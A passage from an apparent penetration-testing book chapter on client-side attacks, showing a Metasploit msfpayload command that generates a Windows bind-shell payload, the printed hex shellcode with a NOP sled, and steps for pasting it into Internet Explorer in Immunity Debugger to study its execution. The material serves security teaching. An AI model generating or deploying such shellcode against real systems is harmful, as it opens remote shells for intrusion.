background image

Exploitation Using Client-Side Attacks

113

chapters, a bind shell simply listens on a port on a target machine to which 
we can connect.

root@bt:/opt/framework3/msf3# 

msfpayload windows/shell/bind_tcp LPORT=443 C

When these commands are executed, “stage 1” and “stage 2” shellcodes 

are created in the output. We are concerned only with the stage 1 shellcode, 
because Metasploit will handle sending the second stage for us when we con-
nect to it. Copy and paste the shellcode from stage 1 into a text editor of your 
choice. You’ll need to do some minor editing before proceeding.

Now that you have your basic shellcode, add as many NOPs as you want 

to the beginning of it (such as 

\x90\x90\x90\x90\x90

). Then remove all 

\x

 

occurrences so it looks similar to the following:

909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090f
ce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f0
52578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c
738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe058
5f5a8b12eb865d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504
050405068ea0fdfe0ffd59731db5368020001bb89e66a10565768c2db3767ffd5535768b7e938ffffd553535768
74ec3be1ffd5579768756e4d61ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5f
fd593536a005653576802d9c85fffd501c329c685f675

ecc3

All this is necessary because you need to use a particular format so that 

Immunity Debugger will accept your copy-and-paste of assembly instructions. 
Now you have a bind shell with some NOPs in front of it for testing. Next, 
open up any executable—let’s use 

iexplore.exe

 for this example. Open Immu-

nity Debugger, choose 

File

Open

, and point to an executable. You should 

see a number of assembly instructions in the main window (the largest one). 
Left-click the first instruction on the screen, and hold down 

SHIFT

 while left-

clicking to highlight about 300 instructions below it.

Copy the shellcode to the clipboard, and right-click in the Immunity 

Debugger window and choose 

Binary

Binary paste

. This will paste the 

assembly instructions from the example into the Immunity Debugger window. 
(Remember that we are doing this to identify how NOPs work and how 
assembly instructions are executed.)

You can see in Figure 8-1 that a number of NOPs are inserted; if you 

were to scroll down, you would see your shellcode.

When we first exported our shellcode in a 

bind_tcp

 format, the last instruc-

tion through stage 1 ended with 

ecc3

. Locate the last set of memory instructions 

we added ending in 

ecc3

.

Right after the 

ecc3

, press F2 to create a breakpoint. When you add a 

breakpoint, once execution flow encounters it, program execution will pause 
and will not continue. This is important here, because the code still has a lot 
of the old remnants of the application we opened, and continuing would 
cause the application to crash, because we already inserted our own code 
into it. We want to stop and investigate what happened before the applica-
tion crashes.